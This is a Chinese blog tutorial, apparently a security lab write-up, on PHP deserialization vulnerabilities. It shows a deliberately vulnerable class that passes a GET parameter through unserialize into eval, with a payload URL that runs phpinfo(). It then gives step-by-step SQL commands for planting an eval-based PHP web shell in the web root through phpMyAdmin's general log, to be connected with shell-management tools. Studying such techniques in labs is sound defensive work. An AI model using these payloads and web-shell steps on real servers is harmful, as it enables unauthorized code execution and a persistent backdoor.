反序列化漏洞_反序列化漏洞

最新推荐文章于 2023-11-28 15:51:17 发布
最新推荐文章于 2023-11-28 15:51:17 发布
阅读量145 收藏
点赞数
文章标签: 反序列化漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39880337/article/details/111334092
版权

定义:序列化就是把一个对象变成可以传输的字符串,可以以特定的格式在进程之间跨平台、安全的进行通信。

序列化

下面将进行序列号测试,了解他如何把对象变成可以传输的字符串,在apache上新建下面这段代码然后访问

 <?php class Stu{public $name;public $sex;public $age;public $score;}$stu1 = new Stu();$stu1 ->name = "kobe";$stu1 ->sex = true;$stu1 ->age = 16;$stu1 ->score = 60;echo serialize($stu1);?>页面输出如下:O:3:"Stu":4:{s:4:"name";s:4:"kobe";s:3:"sex";b:1;s:3:"age";i:16;s:5:"score";i:60;}O代表object,3代表"Stu"的长度也就是class的长度为3,s代表string类型,第一个分号(;)代表的是属性的名字,第二个分号(;)代表的是属性的值,b代表bool类型,i表示int类型。

反序列化

 <?php class Stu{public $name;public $sex;public $age;public $score;}$stu1 = new Stu();$stu1 ->name = "kobe";$stu1 ->sex = true;$stu1 ->age = 16;$stu1 ->score = 60;echo "";echo serialize($stu1);$str = <<O:3:"Stu":4:{s:4:"name";s:4:"kobe";s:3:"sex";b:1;s:3:"age";i:16;s:5:"score";i:60;}HTML;echo "";var_dump(unserialize($str));?>以下就是反序列化的输出内容object(Stu)#2 (4) { ["name"]=> string(4) "kobe" ["sex"]=> bool(true) ["age"]=> int(16) ["score"]=> int(60) }

e06a67397d0523a1938b63ba4eaee2da.png

反序列化漏洞

 <?php class Test{public $str='kobe';function __destruct(){        @eval($this->str);}}$test = new Test();echo serialize($test);echo "";//$t = serialize($test);$t = $_GET['obj'];var_dump(unserialize($t));?>
 eval(phpcode)

eval() 函数把字符串按照 PHP 代码来计算。

该字符串必须是合法的 PHP 代码,且必须以分号结尾。

如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。

3f7cbe1486811a0c38ba1a0d1b21a683.png

 当我们输入如下的链接时,页面成功反序列化http://192.168.1.132/PHP/class/ldong.php?obj=O:4:"Test":1:{s:3:"str";s:6:"kobes;";}输出如下object(Test)#2 (1) { ["str"]=> string(6) "kobes;" } 
 当我们输入如下的链接时,页面成功访问了phpinfohttp://192.168.1.132/PHP/class/ldong.php?obj=O:4:"Test":1:{s:3:"str";s:10:"phpinfo();";}通过代码审计,我们发现在代码层面并没有调用到eval函数,事实上当销毁实例化类(对象)的时候,__destrutc() 函数会被自动调用,并且输出字符串[ This is funtion --destrutc() ],调用GET请求,反序列化成功。$t = $_GET['obj'];var_dump(unserialize($t));__construct   在创建对象时自动调用__destruct      在销毁对象时自动调用__call()        在对象中调用一个不可访问方法时被调用

235d3e9674c56147e5c816a51bf026f7.png

phpmyadmin通过日志写入一句话

环境准备

phpstudy2018

虚拟机win2k3

渗透思路

phpmyadmin有日志记录功能,如果我们把日志记录开启,并且把一句话木马在sql界面输入,让日志把木马写入到loudong-PC.log文件里。

但是这个路径下的文件无法解析一句话木马,所以我们要把记录日志文件的路径改变,改到他发布网页的路径下(通过phpinfo.php网页下的document_root参数就是网页发布的绝对路径),一般为www下的子文件夹,把.log文件修改为php文件进行解析.

渗透步骤

一、判断日志是否开启

通过web登录phpmyadmin,查看日志记录功能是否开启,sql界面输入命令:show global variables like '%general%';   查看日志记录是否开启。

general_log_file是日志的保存路径C:\phpStudy_PRO\PHPTutorial\MySQL\data\loudong-PC.log

8b67fdf7db4967b7de9f4a1befd93860.png

二、开启日志记录

sql框输入命令:set global general ='on';,成功开启日志记录。

把日志记录的路径改为WWW下的xshell.php文件,输入以下命令

set global general_log_file = 'C:/phpStudy_PRO/PHPTutorial/WWW/xshell.php'

1dc5ab8a0836761cf06548decce34558.png

如上图所示,成功改变了日志记录的位置和文件名。

三、写入一句话木马

在sql输入框输入以下代码

select '<?php eval($_POST["admin"]);?>';

通过查询发现已经成功把一句话木马写入xshell.php,

cf967cda014849e61e99a0ff5fbb063b.png

下面认证是否能成功执行一句话木马,然后用蚁剑或者中国菜刀进行连接一句话木马

4403b998d93a181f0c1fc7edb5098c11.png

weixin_39880337
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
反序列化漏洞
slash_HK的博客
12-21 2325
Java php反序列化漏洞复现细节及技术点记录,超详细!
Web安全:PHP反序列化漏洞的 测试(向服务器写入一句话.)
网络安全领域___专研者.
05-29 554
程序员在写代码时,没有对用户输入的序列化字符串做一个严格检测,导致恶意的用户可以控制反序列化的一个过程,因此导致XSS漏洞,代码执行,SQT注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。在进行反序列化的时候就有可能触发对象中的一些魔术方法.
网络安全-反序列化漏洞简介、攻击与防御
关注网络安全、云原生安全
03-13 1万+
目录 简介 PHP序列化 Python序列化 攻击 PHP举例 Python举例 防御 参考 简介 各种语言都有反序列化漏洞,Java、PHP、Python等。序列化即将对象转化为字节流,便于保存在文件,内存,数据库中;反序列化即将字节流转化为对象,也就是序列化的逆过程。 PHP序列化 php中序列化和反序列化函数为serialize、unserialize。 我们尝试对一些类型进行序列化 <?php // 字符串类型 $s = "a string"; $serializ
常见的Web漏洞——反序列化漏洞
江左盟的博客
06-07 1万+
反序列化简介 序列化:把对象转换为字节序列的过程,即把对象转换为可以存储或传输的数据的过程。例如将内存中的对象转换为二进制数据流或文件,在网络传输过程中,可以是字节或是XML等格式。 反序列化:把字节序列恢复为对象的过程,即把可以存储或传输的数据转换为对象的过程。例如将二进制数据流或文件加载到内存中还原为对象。 反序列化漏洞首次出现在2015。虽然漏洞较新,但利用十分热门。主要原因是对用户可控制的数据进行反序列化时,攻击者能够操纵序列化的对象,从而将精心构造的恶意数据传递到应用程序代码中
[网络安全学习篇68]:反序列化漏洞
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
05-15 2006
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以我就想到了通过写博客(课程笔记)的形式去学习它,虽然写博客会让我多花几倍的时间去学习它,但是当我完成一篇博客所获得的成就感和你们对于我的认同感,让我很满足,能够鼓励我一天天的坚持下去,也希望和我一起学习本期视频的"同道"们也能给一直坚持下去。我们大家一起加油。由于作者本身也是网络信息安全小白,大部分知识点都..
反序列化漏洞详解
热门推荐
LJH1999ZN的博客
03-07 3万+
目录 一、什么是序列化和反序列化 二、什么是反序列化漏洞 三、序列化函数(serialize) 四、反序列化(unserialize) ​五、什么是PHP魔术方法 六、一些常见的魔术方法 七、魔术方法的利用 八、反序列化漏洞的利用 1.__destruct()函数 2.__wakeup() 3.toString() ​九、反序列化漏洞的防御 一、什么是序列化和反序列化 序列化是将对象转换为字符串以便存储传输的一种方式。而反序列化恰好就是序列化的逆过程,反序列化会将字符串.
Java反序列化漏洞利用工具.zip
04-10
Java反序列化漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列化和反序列化过程中的安全问题。序列化是将对象状态转换为可存储或传输的数据格式的过程,而反序列化则是将这些数据恢复为原来的对象...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:反序列化漏洞反序列化漏洞通常出现在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
Shiro反序列化漏洞检测工具
01-05
在Shiro的早期版本中,尤其是1.2.4及以下版本,存在一个严重的反序列化漏洞,这个漏洞可能导致远程代码执行(RCE)的风险,攻击者可以利用这个漏洞对目标系统进行非法操作。 反序列化漏洞通常出现在应用程序接收到...
Java反序列化漏洞介绍书籍
08-17
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在Java应用程序中。反序列化是将已序列化的对象数据转换回其原始对象状态的过程。当这个过程处理不当时,恶意用户可以利用这些漏洞来执行任意代码,从而导致...
反序列化漏洞反shell笔记 持续更新
最新发布
tutuwanc的博客
11-28 377
这个是没有安装 netcat的nodejs的反序列化代码。安装 netcat的nodejs的反序列化代码。
反序列化漏洞详解 一文了解反序列化漏洞
闵行小鱼塘
11-13 5630
本篇总结归纳反序列化漏洞,包括php、java、python三种语言
vulhub——shiro反序列化getshell漏洞复现
web17535224648的博客
08-26 1247
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。...
从一道sql注入题认识sql一句话木马
xiaolong22333的博客
12-02 620
最近做到一道题,是ctfshow平台的,题目如下 没有过滤,但如果返回结果中没有ASCII码在 00-7f 范围的,才会查询成功。我以为要用什么方法绕过,但看了师傅们的做法才知道,还可以把查询结果写到到一个文件里,而在linux服务器下web文件夹的目录为/var/www/html/ (看来我知道的还是太少了๐·°(৹˃̵﹏˂̵৹)°·๐) 所以payload为 1' union select 1,password from ctfshow_user5 into outfile '/var/www/htm
php+反序列化代码执行漏洞,PHP反序列化漏洞
weixin_30444517的博客
03-11 288
0x001 漏洞产生原理在反序列化的过程中自动触发了某些魔术方法。未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致XSS、代码执行、文件写入、文件读取等不可控后果。0x002 漏洞触发条件一般只能通过代码审计的方式挖掘该漏洞,寻找代码中unserialize()函数的变量可控,且PHP文件代码中存在可利用的类,同时类中具有魔术方法。0x003 PHP魔术方法__cons...
反序列化漏洞(PHP)
qq_42383069的博客
05-18 6471
反序列化漏洞 0x01. 序列化和反序列化是什么 序列化:变量转换为可保存或传输的字符串的过程; 反序列化:把序列化的字符串再转化成原来的变量使用 作用:可轻松地存储和传输数据,使程序更具维护性 0x02. 为什么会有序列化 序列化用于存储或传递 PHP 的值的过程中,同时不丢失其类型和结构 0x03. 序列化和反序列化代码示例 <?php class User { public $username = 'admin'; public $password = '123456';
反序列化漏洞总结
dreamthe的博客
11-24 3409
1.了解序列化和反序列化 在学习反序列化漏洞之前,需要了解什么是反序列化和序列化,我看到了一个很好的比喻,觉得很适合帮助大家对于两者理解,相信大家都在淘宝买过东西,不知道有没有买过那种小型家具,我有买过鞋柜,商家发货的时候不会将一个完好的鞋柜寄给你,第一因为中途可能会损坏,第二呢就是增加包装成本。所以商家都会将鞋柜所有部件打包寄过来,顾客拿到快递在自己根据安装教程安装好鞋柜。那么这里面就有两个过程,一个是商家将所以部件打包发走,一个是你拿到安装还原。那么序列化就是商家打包过程,反序列化就是将商品还原过程。
网络安全课第六节 反序列化漏洞的检测与防御
fegus的博客
07-11 3470
上一讲介绍了 XXE 漏洞,它在业务场景中很容易用于读取敏感文件、进行代码执行,甚至也会用来渗透内网,也因此 XXE 漏洞常被当作一种严重漏洞来对待。本讲我将介绍另一种常用来实现远程代码执行的漏洞类型——反序列化漏洞,这几年经常出现在 Java 公共库,比如阿里的 fastjson,还有一些 Java 应用服务器,比如 JBoss。PHP 也有反序列化,比如著名的 Joomla 内容管理系统很多编程语言都有这种反序列化功能,若对反序列化的数据未做有效过滤和限制,就可能导致这种漏洞的产生。下面我就详细给你介绍
Typecho反序列化漏洞寻找思路
问彡心的博客
08-01 1087
Typecho靶场一次成功的渗透思路,一定不能错过
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值